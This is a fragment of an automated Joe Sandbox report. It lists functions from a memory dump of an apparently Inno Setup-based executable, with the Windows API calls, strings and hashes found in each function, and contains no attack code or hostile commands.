                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                            • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                            APIs
                                                            • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                              • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast
                                                            • String ID:
                                                            • API String ID: 734332943-0
                                                            • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                            • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                            • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                            • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                            APIs
                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                            • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                            • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                            • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                            • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                            • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                            • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                            • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                            • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                            • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                            • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                            • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                            • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 626452242-0
                                                            • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                            • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                            • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                            • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                            • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                            • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                            • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                            • Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
                                                            • Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                            • Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
                                                            APIs
                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                            • Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                            • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                            • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                            • API String ID: 2323315520-3614243559
                                                            • Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                            • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                            • Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                            • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00458993
                                                            • QueryPerformanceCounter.KERNEL32(02173858,00000000,00458C26,?,?,02173858,00000000,?,00459322,?,02173858,00000000), ref: 0045899C
                                                            • GetSystemTimeAsFileTime.KERNEL32(02173858,02173858), ref: 004589A6
                                                            • GetCurrentProcessId.KERNEL32(?,02173858,00000000,00458C26,?,?,02173858,00000000,?,00459322,?,02173858,00000000), ref: 004589AF
                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02173858,02173858), ref: 00458A33
                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                            • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                            • API String ID: 770386003-3271284199
                                                            • Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                            • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                            • Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                            • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                            APIs
                                                              • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02172BE0,?,?,?,02172BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                              • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                              • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02172BE0,?,?,?,02172BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                              • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02172BE0,?,?,?,02172BE0), ref: 004782E8
                                                              • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02172BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                              • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02172BE0,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                            • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                            • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                            • API String ID: 883996979-221126205
                                                            • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                            • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                            • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                            • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                            APIs
                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MessageSendShowWindow
                                                            • String ID:
                                                            • API String ID: 1631623395-0
                                                            • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                            • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                            • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                            • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                            APIs
                                                            • IsIconic.USER32(?), ref: 004183A3
                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                            • GetWindowRect.USER32(?), ref: 004183DC
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                            • ScreenToClient.USER32(00000000), ref: 00418408
                                                            • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
